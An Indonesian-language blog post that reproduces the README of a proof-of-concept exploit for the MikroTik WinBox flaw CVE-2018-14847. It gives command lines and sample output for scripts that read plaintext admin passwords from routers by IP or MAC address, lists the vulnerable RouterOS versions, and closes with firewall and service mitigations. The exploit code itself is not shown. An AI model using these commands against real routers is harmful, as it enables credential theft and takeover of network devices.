WinboxExploit
Ini adalah bukti konsep kerentanan WinBox yang kritis (CVE-2018-14847) yang memungkinkan pembacaan file sewenang-wenang terhadap kata sandi teks biasa.
Persyaratan
- Python 3+
Skrip ini TIDAK akan berjalan dengan Python 2.x atau lebih rendah.
Cara Penggunaan
Script sederhana digunakan dengan argumen sederhana di commandline.
WinBox (TCP / IP)
Memanfaatkan kerentanan dan membaca kata sandi.
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
Contoh:
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord
Server MAC WinBox (Layer 2)
Anda dapat mengekstrak file meskipun perangkat tidak memiliki alamat IP.
Pemeriksaan penemuan sederhana untuk perangkat Mikrotik yang terhubung secara lokal.
python3 MACServerDiscover.py
Contoh:
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Memanfaatkan kerentanan dan membaca kata sandi.
python3 MACServerExploit.py <MAC-ADDRESS>
Contoh:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord
Versi Rentan
Semua versi RouterOS dari 2015-05-28 hingga 2018-04-20 rentan terhadap eksploitasi ini.
Perangkat Mikrotik yang menjalankan versi RouterOS:
- Jangka panjang: 6.30.1 - 6.40.7
- Stabil: 6,29 - 6,42
- Beta: 6.29rc1 - 6.43rc3
Untuk informasi lebih lanjut, lihat: https://blog.mikrotik.com/security/winbox-vulnerability.html
Teknik Mitigasi
- Tingkatkan perute ke versi RouterOS yang menyertakan perbaikan.
- Nonaktifkan layanan WinBox di router.
- Anda dapat membatasi akses ke layanan WinBox ke alamat IP tertentu dengan yang berikut ini:
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
- Anda dapat menggunakan beberapa Aturan Filter (ACL) untuk menolak akses eksternal ke layanan WinBox:
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
- Membatasi akses ke layanan mac-winbox dapat dilakukan dengan menentukan antarmuka yang diizinkan:
/tool mac-server mac-winbox
0 komentar:
Posting Komentar